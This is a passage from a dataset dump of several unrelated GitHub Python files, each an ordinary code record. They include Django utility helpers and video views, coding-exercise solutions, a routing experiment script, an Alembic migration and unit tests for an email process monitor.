u'ç':'c', u'Ç':'C', u'ü':'u', u'Ü':'U',\n    u'ö':'o', u'Ö':'O', u'ğ':'g', u'Ğ':'G'\n}\nRUSSIAN_MAP = {\n    u'а':'a', u'б':'b', u'в':'v', u'г':'g', u'д':'d', u'е':'e', u'ё':'yo', u'ж':'zh',\n    u'з':'z', u'и':'i', u'й':'j', u'к':'k', u'л':'l', u'м':'m', u'н':'n', u'о':'o',\n    u'п':'p', u'р':'r', u'с':'s', u'т':'t', u'у':'u', u'ф':'f', u'х':'h', u'ц':'c',\n    u'ч':'ch', u'ш':'sh', u'щ':'sh', u'ъ':'', u'ы':'y', u'ь':'', u'э':'e', u'ю':'yu',\n    u'я':'ya',\n    u'А':'A', u'Б':'B', u'В':'V', u'Г':'G', u'Д':'D', u'Е':'E', u'Ё':'Yo', u'Ж':'Zh',\n    u'З':'Z', u'И':'I', u'Й':'J', u'К':'K', u'Л':'L', u'М':'M', u'Н':'N', u'О':'O',\n    u'П':'P', u'Р':'R', u'С':'S', u'Т':'T', u'У':'U', u'Ф':'F', u'Х':'H', u'Ц':'C',\n    u'Ч':'Ch', u'Ш':'Sh', u'Щ':'Sh', u'Ъ':'', u'Ы':'Y', u'Ь':'', u'Э':'E', u'Ю':'Yu',\n    u'Я':'Ya'\n}\nUKRAINIAN_MAP = {\n    u'Є':'Ye', u'І':'I', u'Ї':'Yi', u'Ґ':'G', u'є':'ye', u'і':'i', u'ї':'yi', u'ґ':'g'\n}\nCZECH_MAP = {\n    u'č':'c', u'ď':'d', u'ě':'e', u'ň':'n', u'ř':'r', u'š':'s', u'ť':'t', u'ů':'u',\n    u'ž':'z', u'Č':'C', u'Ď':'D', u'Ě':'E', u'Ň':'N', u'Ř':'R', u'Š':'S', u'Ť':'T',\n    u'Ů':'U', u'Ž':'Z'\n}\n\nPOLISH_MAP = {\n    u'ą':'a', u'ć':'c', u'ę':'e', u'ł':'l', u'ń':'n', u'ó':'o', u'ś':'s', u'ź':'z',\n    u'ż':'z', u'Ą':'A', u'Ć':'C', u'Ę':'e', u'Ł':'L', u'Ń':'N', u'Ó':'o', u'Ś':'S',\n    u'Ź':'Z', u'Ż':'Z'\n}\n\nLATVIAN_MAP = {\n    u'ā':'a', u'č':'c', u'ē':'e', u'ģ':'g', u'ī':'i', u'ķ':'k', u'ļ':'l', u'ņ':'n',\n    u'š':'s', u'ū':'u', u'ž':'z', u'Ā':'A', u'Č':'C', u'Ē':'E', u'Ģ':'G', u'Ī':'i',\n    u'Ķ':'k', u'Ļ':'L', u'Ņ':'N', u'Š':'S', u'Ū':'u', u'Ž':'Z'\n}\n\ndef _makeRegex():\n    ALL_DOWNCODE_MAPS = {}\n    ALL_DOWNCODE_MAPS.update(LATIN_MAP)\n    ALL_DOWNCODE_MAPS.update(LATIN_SYMBOLS_MAP)\n    ALL_DOWNCODE_MAPS.update(GREEK_MAP)\n    
ALL_DOWNCODE_MAPS.update(TURKISH_MAP)\n    ALL_DOWNCODE_MAPS.update(RUSSIAN_MAP)\n    ALL_DOWNCODE_MAPS.update(UKRAINIAN_MAP)\n    ALL_DOWNCODE_MAPS.update(CZECH_MAP)\n    ALL_DOWNCODE_MAPS.update(POLISH_MAP)\n    ALL_DOWNCODE_MAPS.update(LATVIAN_MAP)\n    \n    s = u\"\".join(ALL_DOWNCODE_MAPS.keys())\n    regex = re.compile(u\"[%s]|[^%s]+\" % (s,s))\n    \n    return ALL_DOWNCODE_MAPS, regex\n\n_MAPINGS = None\n_regex = None\ndef downcode(s):\n    \"\"\"\n    This function 'downcodes' the string passed in the parameter s. This is useful\n    when we want the closest representation of a multilingual string in simple\n    Latin chars. The most probable use is before calling slugify.\n    \"\"\"\n    global _MAPINGS, _regex\n\n    if not _regex:\n        _MAPINGS, _regex = _makeRegex() \n\n    downcoded = \"\"\n    for piece in _regex.findall(s):\n        if _MAPINGS.has_key(piece):\n            downcoded += _MAPINGS[piece]\n        else:\n            downcoded += piece\n    return downcoded\n\n\ndef slugify_unique(value, model, slugfield=\"slug\"):\n    suffix = 0\n    potential = base = slugify(downcode(value))\n    while True:\n        if suffix:\n            potential = \"-\".join([base, str(suffix)])\n        if not model.objects.filter(**{slugfield: potential}).count():\n            return potential\n        suffix += 1\n\n\"\"\"\nslugify_unique - end\n\"\"\"\n\n\ndef clean_text_for_search(text):\n    \"\"\"\n    Prepare text for indexing and search.\n    \"\"\"\n    # Get the normalized unicode text.\n    text= force_unicode(text).strip()\n\n    # Remove e-mail quotation from the beginnings of the string.\n    text= re.sub(r'^\\>+', '', text)\n\n    # Remove e-mail addresses.\n    text= re.sub(r'\\b[A-Za-z0-9_\\.-]+@[A-Za-z0-9_\\.-]+[A-Za-z0-9_][A-Za-z0-9_]\\b', '', text)\n\n    # Try to convert html to text.\n    try:\n        text= html2text(text)\n    except:\n        pass\n\n    # Clean the text from special characters, such as\n    # section divisions ***, etc. 
but preserve punctuation.\n text= re.sub(r'\\B\\W{2,}\\B', ' ', text)\n\n # Remove all returns and new lines.\n text= re.sub(r'\\n+', ' ', text)\n text= re.sub(r'\\r+', ' ', text)\n\n # Convert multiple spaces to singles.\n text= re.sub(r'\\s{2,}', ' ', text)\n\n return text\n\n\ndef get_domain_name(id=1):\n \"\"\"\n Get the project's domain name by its ID.\n Default is the 1st project.\n \"\"\"\n try:\n return Site.objects.get(id=id).domain\n except Site.DoesNotExist: # Return the default one.\n return Site.objects.get(id=1).domain\n\n\ndef increment_id(model, field):\n \"\"\"\n Get the maximum of `field`, return its value increment to 1.\n \"\"\"\n try:\n return model.objects.values(field).distinct()\\\n .order_by('-'+field)[0][field] + 1\n except IndexError: # No records yet\n return 1\n except TypeError: # Non-integer/float field cannot be incremented.\n return None\n\n\ndef re_subject(line):\n \"\"\"\n Constructing a subject in a manner 'Re[N]: subject line' or \n 'Re(N): subject line', based on the given line.\n\n If there's already such a pattern, increment N, otherwise simply add\n 'Re: ' to the beginning.\n \"\"\"\n caseRe= re.match(r'(?P<num>Re\\:)', line)\n caseReN= re.match(r'Re(\\[|\\()(?P<num>\\d+)(\\]|\\))', line)\n try:\n return line.replace(caseReN.group('num'),\n str(int(caseReN.group('num'))+1))\n except:\n try:\n return line.replace(caseRe.group('num'), 'Re[1]:')\n except:\n pass\n return 'Re: ' + line\n\n\ndef process_filter_request(request, statuses):\n \"\"\"\n Process GET with parameters:\n - extract params for initial dict\n - prepare kwargs for db query\n - define urlparams string.\n \"\"\"\n # \"Constants\".\n filtered_status= {'all': [k[0] for k in statuses],\n 'successful': ['successful', 'part_successful'],\n 'unsuccessful': ['refused', 'no_info'],\n 'unresolved': ['in_progress', 'overdue', 'long_overdue', 'withdrawn', 'awaiting']}\n\n # Define kwargs for filtering.\n query, initial= dict(), dict()\n \n # Define keywords.\n initial.update({'keywords': request.GET.get('keywords', '')})\n if initial['keywords'] != '':\n query.update({'summary__iregex': initial['keywords'].replace(' ', '|')})\n \n # Define status. 
Warning: status is in the param name, not value!\n    status= 'all'\n    for param in dict(request.GET).keys():\n        if param in filtered_status.keys():\n            status= param\n            break\n    query.update({'status__in': filtered_status[status]})\n\n    # URL params\n    urlparams= {'status': status, 'params': \\\n        '?'+'&'.join(['='.join([k, v[0]]) for k, v in dict(request.GET).iteritems()])}\n    \n    # Define `date_after` and `date_before`.\n    initial['date_after']= request.GET.get('date_after', '')\n    initial['date_before']= request.GET.get('date_before', '')\n    if initial['date_after'] != '':\n        query.update({'created__gte': strftime('%Y-%m-%d',\n            strptime(initial['date_after'], '%d-%m-%Y'))})\n    if initial['date_before'] != '':\n        query.update({'created__lte': strftime('%Y-%m-%d 23:59:59',\n            strptime(initial['date_before'], '%d-%m-%Y'))})\n    return initial, query, urlparams\n\n\ndef id_generator(size=6, chars=string.ascii_lowercase+string.digits):\n    \"\"\"\n    Generate unique filename to store in FS.\n    \"\"\"\n    return ''.join(random.choice(chars) for x in range(size))\n\n\ndef handle_image(f, store_path, **kwargs):\n    \"\"\"\n    Upload file, create a thumbnail from it, name it randomly,\n    save to site_media, return its name.\n    \"\"\"\n    filename_len= kwargs.get('filename_len', 16)\n    thumbnail_size= kwargs.get('thumbnail_size', (70, 70))\n    ext= f.name.split('.')[-1]\n    ext= '.'+ext if ext != f.name else '' # no extension\n    filename= id_generator(filename_len)\n    path= store_path + filename + ext\n    with open(path, 'wb+') as destination:\n        for chunk in f.chunks():\n            destination.write(chunk)\n    im= Image.open(path) # Create thumbnail\n    if im.mode != \"RGB\":\n        im = im.convert(\"RGB\")\n    im.thumbnail(thumbnail_size, Image.ANTIALIAS)\n    im.save(path, \"JPEG\")\n    return filename + ext\n\n\ndef save_attached_file(f, store_root, **kwargs):\n    \"\"\"\n    Check if attachments are ok, save files,\n    return what is needed to save attachment in the db.\n    \"\"\"\n    max_size= kwargs.get('max_size', 104857600) # Default limit is 100MB\n    dir_name= kwargs.get('dir_name', id_generator()) # Random name, if not given\n    dir_id= kwargs.get('dir_id', None)\n    if dir_id is None: # Now, if not given\n        dir_id= datetime.strftime(datetime.utcnow().replace(\n            tzinfo=utc), '%d-%m-%Y_%H-%M')\n\n    f_info= {'size': len(f), 'path': None, 'errors': []} # Object to return\n    if f_info['size'] > max_size:\n        f_info['errors'].append(AppMessage('AttachTooBig').message %\n            {'filename': f.name,\n             'maxsize': filesizeformat(max_size)})\n\n    # TO-DO: 'Sniff' the file before saving\n\n    if len(f_info['errors']) == 0:\n\n        # Ensure all directory names.\n        dir_full= ('%s/attachments/%s/%s' % (\n            store_root, dir_name, dir_id)).replace('//', '/')\n        path_report= ('%s/%s/%s' % (\n            dir_name, dir_id, f.name)).replace('//', '/')\n        path_full= ('%s/%s' % (dir_full, f.name)).replace('//', '/')\n\n        # Ensure directory on disk.\n        if not os.path.exists(dir_full):\n            os.makedirs(dir_full)\n\n        try:\n            path= default_storage.save(path_full, ContentFile(f.read()))\n            f_info['path']= path_report # Returns relative (to MEDIA_ROOT) path.\n        except Exception as e:\n            # Use f.name here: there is no local variable `filename` in this function.\n            err= AppMessage('CantSaveAttachmnt').message % {\n                'filename': f.name, 'error': e}\n            print >> sys.stderr, '[%s] %s' % (datetime.now().isoformat(), err)\n            f_info['errors'].append(err)\n    return f_info\n\n\ndef email_from_name(name, **kwargs):\n    \"\"\"\n    Build e-mail address from given name.\n    \"\"\"\n    id= kwargs.get('id', None)\n    delimiter=kwargs.get('delimiter', None)\n    domain= kwargs.get('domain', get_domain_name())\n    name= slugify(downcode(name))\n    if 
id:\n template= '%s-%s@%s' % (name, id, domain)\n else:\n template= '%s@%s' % (name, domain)\n if delimiter:\n template= template.replace('-', delimiter)\n return template\n\n\ndef login(request, **kwargs):\n \"\"\"\n Custom view - handling the login form with \"Remember me\" checkbox.\n \"\"\"\n template_name= kwargs.get('template_name', 'registration/login.html')\n response= auth_views.login(request, template_name)\n if request.POST.has_key('remember_me'):\n request.session.set_expiry(settings.SESSION_EXPIRE_AFTER)\n return response\n\n\ndef update_user_message(msg, notification, kind):\n \"\"\"\n Updates session messages. The structure of the dict is:\n {\n 'success': [<notifications>],\n 'warning': [<notifications>],\n 'warning_yesno': [<notifications>],\n 'fail': [<errors>]\n }\n Anything else is considered as 'info'.\n \"\"\"\n kinds= ('success', 'warning', 'warning_yesno', 'fail',)\n if kind not in kinds:\n kind= 'info'\n notifications= msg.pop(kind, [])\n if notifications is None:\n notifications= []\n if isinstance(notification, basestring):\n try:\n notifications.append(notification)\n except:\n pass\n elif isinstance(notification, list):\n try:\n notifications.extend(notification)\n except:\n pass\n else: # Ignore anything else.\n pass\n msg.update({kind: notifications})\n return msg\n\ndef send_mail_managers(subject, message, fail_silently=False,\n connection=None, headers=None):\n \"\"\"\n Sends a message to the managers, as defined by the MANAGERS setting.\n \"\"\"\n if not settings.MANAGERS:\n return\n mail= EmailMessage(subject, message, settings.SERVER_EMAIL,\n [a[1] for a in settings.MANAGERS], headers=headers)\n mail.send(fail_silently=fail_silently)\n\ndef send_notification(notification):\n \"\"\"\n Sending user a notification about the event\n as described in EventNotification.\n\n Returns True if message successfully sent.\n \"\"\"\n template= 'emails/notification_%s.txt' % notification.action\n subj_name= None\n for attr in ['name', 'summary', 'subject']:\n try:\n subj_name= getattr(notification.item.content_object, attr)\n except:\n pass\n else:\n break\n message_subject= '%s: %s' % (notification.get_action_display(), subj_name)\n message_subject= force_unicode(message_subject)\n message_content= render_to_string(template, {'notification': notification,\n 'domain': get_domain_name()})\n message_notification= EmailMessage(message_subject, message_content,\n settings.SERVER_EMAIL, [notification.receiver_email])\n try: # sending the message to the receiver, check if it doesn't fail.\n message_notification.send(fail_silently=False)\n except Exception as e:\n print >> sys.stderr, '[%s] %s' % (datetime.now().isoformat(),\n AppMessage('MailSendFailed').message % e)\n return False\n return True\n\ndef render_to_pdf(template_src, context_dict, **kwargs):\n \"\"\"\n Renders html template to PDF.\n Returns a response of MIME type 'application/pdf'\n \"\"\"\n context_instanse= kwargs.get('context', None)\n context_dict.update({'download': True})\n result= StringIO.StringIO()\n try:\n html= render_to_string(template_src, context_dict, context_instanse)\n pdf= pisa.pisaDocument(StringIO.StringIO(html.encode(\"UTF-8\")), result,\n encoding=\"utf8\")\n except xhtml2pdf.w3c.cssParser.CSSParseError:\n html= render_to_string(template_src, context_dict, None)\n pdf= pisa.pisaDocument(StringIO.StringIO(html.encode(\"UTF-8\")), result,\n encoding=\"utf8\")\n return pdf, 
result\n","repo_name":"CCLab/sezam","sub_path":"apps/backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"8011531046","text":"from math import acos, degrees\n\n\ndef angles(a, b, c):\n    # The triangle is degenerate or impossible when the longest side\n    # is at least as long as the sum of the other two.\n    longest = max(a, b, c)\n    if longest >= a + b + c - longest:\n        return [0, 0, 0]\n    # Law of cosines for two angles, rounded to whole degrees;\n    # the third follows from the 180-degree angle sum.\n    alpha = round(degrees(acos((b * b + c * c - a * a) / (2.0 * b * c))))\n    beta = round(degrees(acos((a * a + c * c - b * b) / (2.0 * a * c))))\n    return sorted([alpha, beta, 180 - alpha - beta])\n\n\nif __name__ == '__main__':\n    # These \"asserts\" are used only for self-checking and are not necessary for auto-testing\n    assert angles(4, 4, 4) == [60, 60, 60], \"All sides are equal\"\n    assert angles(3, 4, 5) == [37, 53, 90], \"Egyptian triangle\"\n    assert angles(2, 2, 5) == [0, 0, 0], \"It can not be a triangle\"\n\n    print(\"Code's finished? Earn rewards by clicking 'Check' to review your tests!\")\n","repo_name":"palandrp/empireofcode","sub_path":"triangle_angels.py","file_name":"triangle_angels.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"2192200337","text":"import osmnx as ox\nimport numpy as np\nimport pandas as pd\n\nfrom src.final_functions import getAnytimeAlgorithmData, variablesToUseFix\n\nnp.random.seed(0)\n\nG = ox.load_graphml('./data/graph-BH-1km-7-7-22-0130.graphml')\nvariablesToUse = ['noWay', 'isClosed', 'maxSpeed', 'speed']\nvariablesToUseFix(variablesToUse)\n\nallNodes = []\nat_values = []\nsolvableCount = 0\n\nusedNodes = []\n\nwhile solvableCount < 100:\n    currentNodes = []\n    \n    # random nodes maker\n    while(len(currentNodes) < 3):\n        randomNode = int(np.random.choice(G.nodes))\n        if(randomNode not in currentNodes):\n            currentNodes.append(randomNode)\n        \n        if((len(currentNodes) == 3) and (currentNodes in allNodes)):\n            currentNodes = []\n        elif (len(currentNodes) == 3):\n            allNodes.append(currentNodes)\n    \n    try:\n        \n        shortest_path_anytime, desired_path_anytime, explanations_anytime, optimalValues_anytime = getAnytimeAlgorithmData(currentNodes, variablesToUse)\n        at_values.append(optimalValues_anytime)\n        usedNodes.append(currentNodes)\n        \n        newData = pd.DataFrame({\n            'nodes': usedNodes,\n            'anytime_algorithm_values': at_values,\n            })\n\n\n        newData.to_csv('./data/anytime_algorithm_problems.csv', index=False)\n        \n        if optimalValues_anytime[len(optimalValues_anytime) -1] != None:\n            solvableCount += 1\n        \n    except:\n        pass\n\n    print(solvableCount)\n\n    \nnewData = pd.DataFrame({\n    'nodes': usedNodes,\n    'anytime_algorithm_values': at_values,\n    })\n\n\nnewData.to_csv('./data/anytime_algorithm_problems.csv', index=False)","repo_name":"khalid-alsheeb/explainable-road-navigation","sub_path":"website/backend/src/experiments/old/hundredAT.py","file_name":"hundredAT.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37232280121","text":"class Rectangle:\n    # member variables\n    #height = 0\n    #width = 0\n    # constructor\n    def __init__(self, height, width):\n        self.height = height\n        self.width = width\n    # calculate area\n    def area(self):\n        a = self.height * self.width\n        return a\n    # return self.height * self.width - another way\n    # calculate perimeter\n    def perimeter(self):\n        p = (2 * self.height) + (2 * self.width)\n        return p\n\n# create instance\nr1 = Rectangle(10,35)\nr1.height = 20\n\nr2 = Rectangle(2,5)\n\nprint(\"The area of the rectangle is \", r1.area())\nprint(\"The area of the 2nd rectangle is \", r2.area())\nprint(\"The perimeter of the 2nd rectangle 
is \", r2.perimeter())\n\nprint(f\"Area of r1 = {r1.height} x {r1.width} = {r1.area()}\")\nprint(f\"Area of r2 = {r2.height} x {r2.width} = {r2.area()}\")","repo_name":"eimarmichellex98/gtLabs","sub_path":"rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73510419306","text":"\"\"\"empty message\n\nRevision ID: d5e747d48a42\nRevises: 72b8d6801b2f\nCreate Date: 2019-10-08 18:31:33.072892\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd5e747d48a42'\ndown_revision = '72b8d6801b2f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('mission', sa.Column('mission_level', sa.Integer(), nullable=True))\n    op.add_column('mission', sa.Column('prize', sa.Float(), nullable=True))\n    op.drop_constraint('mission_user_id_fkey', 'mission', type_='foreignkey')\n    op.drop_column('mission', 'user_id')\n    op.add_column('user_basic', sa.Column('mission_id', sa.Integer(), nullable=True))\n    op.create_foreign_key(None, 'user_basic', 'mission', ['mission_id'], ['id'])\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint(None, 'user_basic', type_='foreignkey')\n    op.drop_column('user_basic', 'mission_id')\n    op.add_column('mission', sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True))\n    op.create_foreign_key('mission_user_id_fkey', 'mission', 'user_basic', ['user_id'], ['id'])\n    op.drop_column('mission', 'prize')\n    op.drop_column('mission', 'mission_level')\n    # ### end Alembic commands ###\n","repo_name":"tewei/ninetydays","sub_path":"migrations/versions/d5e747d48a42_.py","file_name":"d5e747d48a42_.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74505919466","text":"# https://www.codewars.com/kata/585fc200db20cf20ab00018a\n# 2023-05-23T13:45:04.010+0000\nimport numpy as np\n\ndef max_sum(arr):\n    arr = np.array(arr)\n    max_sum = -1\n    max_subarray = []\n    rows, cols = arr.shape\n    \n    for start_row in range(rows):\n        row_sums = np.zeros(cols)\n        \n        for end_row in range(start_row, rows):\n            row_sums += arr[end_row]\n            \n            # Apply Kadane's algorithm to find the maximum sum subarray in the 1D array\n            current_sum = 0\n            max_sum_so_far = 0\n            window_start = 0\n            start_col = 0\n            end_col = 0\n            \n            for j, num in enumerate(row_sums):\n                current_sum += num\n                \n                if current_sum < 0:\n                    current_sum = 0\n                    window_start = j + 1\n                elif current_sum > max_sum_so_far:\n                    max_sum_so_far = current_sum\n                    # Record the window that actually produced this maximum;\n                    # the running start may move past end_col later in the scan\n                    start_col = window_start\n                    end_col = j\n            \n            # Check if the current subarray has the maximum sum\n            if max_sum_so_far > max_sum:\n                max_sum = max_sum_so_far\n                max_subarray = [start_col, start_row, end_col, end_row]\n    \n    return max_subarray + [max_sum]\n","repo_name":"Eatkin/codewars-solutions","sub_path":"Python/Maximum_2d_subarray_sum-Beta.py","file_name":"Maximum_2d_subarray_sum-Beta.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"29716791341","text":"import unittest\nimport mock\nimport time\nfrom StringIO import StringIO\n\nclass ProcessStateEmailMonitorTestException(Exception):\n    pass\n\nclass ProcessStateEmailMonitorTests(unittest.TestCase):\n    from_email = 'testFrom@blah.com'\n    to_emails = 
('testTo@blah.com', 'testTo2@blah.com')\n to_str = 'testTo@blah.com, testTo2@blah.com'\n subject = 'Test Alert'\n \n def _get_target_class(self):\n from superlance.process_state_email_monitor \\\n import ProcessStateEmailMonitor\n return ProcessStateEmailMonitor\n \n def _make_one(self, **kwargs):\n kwargs['stdin'] = StringIO()\n kwargs['stdout'] = StringIO()\n kwargs['stderr'] = StringIO()\n kwargs['from_email'] = kwargs.get('from_email', self.from_email)\n kwargs['to_emails'] = kwargs.get('to_emails', self.to_emails)\n kwargs['subject'] = kwargs.get('subject', self.subject)\n \n obj = self._get_target_class()(**kwargs)\n return obj\n \n def _make_one_mock_send_email(self, **kwargs):\n obj = self._make_one(**kwargs)\n obj.send_email = mock.Mock()\n return obj\n\n def _make_one_mock_send_smtp(self, **kwargs):\n obj = self._make_one(**kwargs)\n obj.send_smtp = mock.Mock()\n return obj\n \n def test_validate_cmd_line_options_single_to_email_ok(self):\n klass = self._get_target_class()\n \n options = mock.Mock()\n options.from_email = 'blah'\n options.to_emails = 'frog'\n \n validated = klass.validate_cmd_line_options(options)\n self.assertEquals(['frog'], validated.to_emails)\n\n def test_validate_cmd_line_options_multi_to_emails_ok(self):\n klass = self._get_target_class()\n \n options = mock.Mock()\n options.from_email = 'blah'\n options.to_emails = 'frog, log,dog'\n \n validated = klass.validate_cmd_line_options(options)\n self.assertEquals(['frog', 'log', 'dog'], validated.to_emails)\n \n def test_send_email_ok(self):\n email = {\n 'body': 'msg1\\nmsg2',\n 'to': self.to_emails,\n 'from': 'testFrom@blah.com',\n 'subject': 'Test Alert',\n }\n monitor = self._make_one_mock_send_smtp()\n monitor.send_email(email)\n \n #Test that email was sent\n self.assertEquals(1, monitor.send_smtp.call_count)\n smtpCallArgs = monitor.send_smtp.call_args[0]\n mimeMsg = smtpCallArgs[0]\n self.assertEquals(self.to_str, mimeMsg['To'])\n self.assertEquals(email['from'], mimeMsg['From'])\n self.assertEquals(email['subject'], mimeMsg['Subject'])\n self.assertEquals(email['body'], mimeMsg.get_payload())\n\n def _raiseSTMPException(self, mime, to_emails):\n raise ProcessStateEmailMonitorTestException('test')\n \n def test_send_email_exception(self):\n email = {\n 'body': 'msg1\\nmsg2',\n 'to': self.to_emails,\n 'from': 'testFrom@blah.com',\n 'subject': 'Test Alert',\n }\n monitor = self._make_one_mock_send_smtp()\n monitor.send_smtp.side_effect = self._raiseSTMPException\n monitor.send_email(email)\n\n #Test that error was logged to stderr\n self.assertEquals(\"Error sending email: test\\n\", monitor.stderr.getvalue())\n \n def test_send_batch_notification(self):\n test_msgs = ['msg1', 'msg2']\n monitor = self._make_one_mock_send_email()\n monitor.batchmsgs = test_msgs\n monitor.send_batch_notification()\n \n #Test that email was sent\n expected = {\n 'body': 'msg1\\nmsg2',\n 'to': self.to_emails,\n 'from': 'testFrom@blah.com',\n 'subject': 'Test Alert',\n }\n self.assertEquals(1, monitor.send_email.call_count)\n monitor.send_email.assert_called_with(expected)\n \n #Test that email was logged\n self.assertEquals(\"\"\"Sending notification email:\nTo: %s\nFrom: testFrom@blah.com\nSubject: Test Alert\nBody:\nmsg1\nmsg2\n\"\"\" % (self.to_str), monitor.stderr.getvalue())\n \n def test_log_email_with_body_digest(self):\n bodyLen = 80\n monitor = self._make_one_mock_send_email()\n email = {\n 'to': ['you@fubar.com'],\n 'from': 'me@fubar.com',\n 'subject': 'yo yo',\n 'body': 'a' * bodyLen,\n }\n 
monitor.log_email(email)\n self.assertEquals(\"\"\"Sending notification email:\nTo: you@fubar.com\nFrom: me@fubar.com\nSubject: yo yo\nBody:\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...\n\"\"\", monitor.stderr.getvalue())\n self.assertEquals('a' * bodyLen, email['body'])\n\n def test_log_email_without_body_digest(self):\n monitor = self._make_one_mock_send_email()\n email = {\n 'to': ['you@fubar.com'],\n 'from': 'me@fubar.com',\n 'subject': 'yo yo',\n 'body': 'a' * 20,\n }\n monitor.log_email(email)\n self.assertEquals(\"\"\"Sending notification email:\nTo: you@fubar.com\nFrom: me@fubar.com\nSubject: yo yo\nBody:\naaaaaaaaaaaaaaaaaaaa\n\"\"\", monitor.stderr.getvalue())\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"XiaoMi/minos","sub_path":"supervisor/superlance/tests/process_state_email_monitor_test.py","file_name":"process_state_email_monitor_test.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":520,"dataset":"github-code","pt":"37"} +{"seq_id":"22322387535","text":"from django.shortcuts import render_to_response\nfrom videos.models import Stream, Video, Association, Module, UserProfile\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\n\n#send info about request object to template so it can use csrf token\nfrom django.template import RequestContext\n\ndef index(request):\n\tstreams_list=Stream.objects.all()\n\tuser=request.user\n\treturn render_to_response('videos/index.html',locals())\n\t\ndef detail(request,video_url_friendly):\n\ttry:\n\t\tvideo=False\n\t\tvideos=Video.objects.all()\n\t\tfor v in videos:\n\t\t\tif (v.url_friendly()==video_url_friendly):\n\t\t\t\tvideo=v\n\t\t\t\tbreak\n\t\t\t\t\n\t\tif (not video):\n\t\t\traise Http404\n\texcept Video.DoesNotExist:\n\t\traise Http404\n\t\n\t#marking\n\tvideos_completed=[]\n\tvideo_completed=False\n\tprofile=None\n\tif request.user.is_authenticated():\n\t\tprofile=request.user.userprofile_set.all()[0]\n\t\tvideos_completed=profile.completed_videos.all()\n\t\tif (video in videos_completed):\n\t\t\tvideo_completed=True\n\t\n\t\n\tback=video.module_id.association_set.all()[0].association_stream_id.url_friendly()\n\t\n\tnext_video=False\n\t\n\tif (video.module_id.video_count>video.video_part):\n\t\ttry:\n\t\t\tnext_video=Video.objects.get(module_id=video.module_id,video_part=(video.video_part)+1).url_friendly()\n\t\texcept Video.DoesNotExist:\n\t\t\tpass\n\tif not next_video:\n\t\tstream_module=video.next_video_in_stream()\n\t\tif (stream_module):\n\t\t\ttry: #added temporarily (there seems to be an issue with linked-list 2 only)\n\t\t\t\tnext_association=Association.objects.filter(association_stream_id=stream_module[0],association_part=stream_module[1])[0]\n\t\t\t\tnext_video=next_association.association_module_id.video_set.all()[0].url_friendly()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\t\t\n\tif (video.video_part>1):\n\t\ttry:\n\t\t\tprevious_video=Video.objects.get(module_id=video.module_id, video_part=(video.video_part)-1).url_friendly()\n\t\texcept Video.DoesNotExist:\t\n\t\t\tpass\n\n\treturn render_to_response('videos/detail.html',locals(), context_instance=RequestContext(request))\n\ndef search(request):\n\tfrom helpers import get_query\n\t\n\tquery_string = ''\n\tfound_entries = None\n\tif ('q' in request.GET) and request.GET['q'].strip():\n\t\tquery_string = request.GET['q']\n\t\tentry_query = 
get_query(query_string, ['module_title', 'module_description',])\n\t\tfound_entries = Module.objects.filter(entry_query)\n\t\n\treturn render_to_response('videos/search_results.html', { 'query_string': query_string, 'found_entries': found_entries }, context_instance=RequestContext(request))\n\ndef top(request):\n\tentries=[]\n\t\n\tfor module in Module.objects.all():\n\t\tif (module.module_rating):\n\t\t\tscore=float(module.module_rating)*int(module.module_raters)\n\t\t\t#score=float(module.module_rating)*int(module.module_raters)\n\t\t\tentries.append((module,score))\n\t\n\tif (entries):\n\t\tfrom operator import itemgetter\n\t\tentries=sorted(entries,key=itemgetter(1), reverse=True)\n\t\t\n\tmodules=[]\t\n\tfor module_tuple in entries:\n\t\tmodules.append(module_tuple[0])\n\t\n\tmodules=modules[:10]\n\t\n\treturn render_to_response('videos/top.html', { 'modules': modules }, context_instance=RequestContext(request))\n\t\ndef popular(request):\n\tentries=[]\n\t\n\tfor module in Module.objects.all():\n\t\tif (module.module_views):\n\t\t\tviews=int(module.module_views)\n\t\t\tentries.append((module,views))\n\t\n\tif (entries):\n\t\tfrom operator import itemgetter\n\t\tentries=sorted(entries,key=itemgetter(1), reverse=True)\n\t\t\n\tmodules=[]\t\n\tfor module_tuple in entries:\n\t\tmodules.append(module_tuple[0])\n\t\n\tmodules=modules[:10]\n\t\n\treturn render_to_response('videos/popular.html', { 'modules': modules }, context_instance=RequestContext(request))\n\ndef new(request):\n\tentries=[]\n\t\n\tfor module in Module.objects.all():\n\t\tpublished=module.module_published\n\t\tentries.append((module,published))\n\t\n\tif (entries):\n\t\tfrom operator import itemgetter\n\t\tentries=sorted(entries,key=itemgetter(1), reverse=True)\n\t\t\n\tmodules=[]\t\n\tfor module_tuple in entries:\n\t\tmodules.append(module_tuple[0])\n\t\n\tmodules=modules[:10]\n\t\n\treturn render_to_response('videos/new.html', { 'modules': modules }, context_instance=RequestContext(request))\n\ndef random(request):\n\tfrom django.http import 